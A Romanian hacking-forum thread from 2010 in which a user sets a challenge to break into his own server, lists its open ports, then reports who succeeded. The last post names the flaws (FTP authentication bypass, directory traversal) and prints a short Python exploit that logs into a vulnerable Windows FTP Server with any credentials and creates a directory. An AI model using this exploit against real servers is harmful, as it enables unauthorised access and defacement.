pyth0n3 Posted August 18, 2010 Report Posted August 18, 2010 (edited) Target = 01101000 01110100 01110100 01110000 00111010 0010111100101111 01101101 01110111 01100101 01100010 01110011 0110010101110010 01110110 01100101 01110010 00101110 01110011 0110010101101100 01100110 01101001 01110000 00101110 01101111 01110010011001111. crea?i un director in serverul ftp sau un file in care pune?i semn?tura2. pune?i o semn?tura pe pagina webTIME = 24 hours Watch online in real time streaming the screen of server host = 68 74 74 70 3a 2f 2f 6d 77 65 62 73 65 72 76 65 72 2e 73 65 6c 66 69 70 2e 6f 72 67 3a 38 39 Information Gathering:23 port open protocol tcp service telnet53 port open protocol tcp service domain80 port open protocol tcp service http89 port open protocol tcp service su-mit-tg21 port open protocol tcp service ftp5801 port open protocol tcp service vnc-http-15901 port open protocol tcp service vnc-1Operating System is Windows Server 2008 SP2P.S.As prefera s? modifica?i pagina HTML care e ?i s? ad?uga?i doar o semn?tura intrun tag , in acest caz to?i au posibilitatea s? î?i pun? semn?tura Edited August 18, 2010 by pyth0n3 Quote
pyth0n3 Posted August 18, 2010 Author Report Posted August 18, 2010 (edited) HINT: Pt a modifica pagina web trebuie s? ave?i access la server [you need the credentials]Take a look behind the curtain ...The web server is vulnerable Watch on-line in real time streaming the screen of server host = 68 74 74 70 3a 2f 2f 6d 77 65 62 73 65 72 76 65 72 2e 73 65 6c 66 69 70 2e 6f 72 67 3a 38 39 Edited August 18, 2010 by pyth0n3 Quote
pyth0n3 Posted August 19, 2010 Author Report Posted August 19, 2010 (edited) Host is down Au ob?inut access ftp urmatorii useri :Flubber from RSTGnix from ptrace.netAu ob?inut access la webserver urm?torii useri:Flubber from RSTServerul ftp era vulnerabil la Authentication-BypassServerul Web era vulnerabil la Directory-Atraversal Codul pt a vedea structura de la directory era un simplu Space == %20Watch online video ==>> Obtineti Access part1 Watch online video ==>> Obtineti Access part2 Download full video ===>> Here Aici este codul pe care l-am rescris in python pt Authentication-Bypass ftp# Original exploit was written in perl# Exploit link: [ http://www.exploit-db.com/exploits/12119/]# Software Link: [http://www.windowsftpserver.com/free_download.html]# Windows FTP Server is vulnerable to authentication-bypass # that will allow attackers to connect # with any username and password# I just rewrote this code in python import socketimport sysimport timeprint '[+] Wait...' time.sleep(1)host = '0.0.0.0's = socket.socket(socket.AF_INET, socket.SOCK_STREAM)def alert(msg): print >>sys.stderr, msg sys.exit(1)try: s.connect((host, 21))except: alert('[+] Failed ' + host +' is down...')print "[+] Sending fake username..."time.sleep(1)s.send("USER whatever_here\r\n" ) print "[+] Sending fake password..."time.sleep(1)s.send("PASS something_here\r\n" )print '[+] Creating a directory ...'time.sleep(1)s.send('MKD ' + ' owned' + '\r\n')s.recv(1024)print '[+] Work done i will exit...'time.sleep(1)s.close()#ENDP.S. dac? pe cineva îl intereseaz? poate s? ma contacteze ?i vom putea face împreuna diverse alte challenge pe diverse sisteme operative Daca va intereseaza si ma ajuta?i vom face lucruri diversePeace! Edited August 20, 2010 by pyth0n3 Quote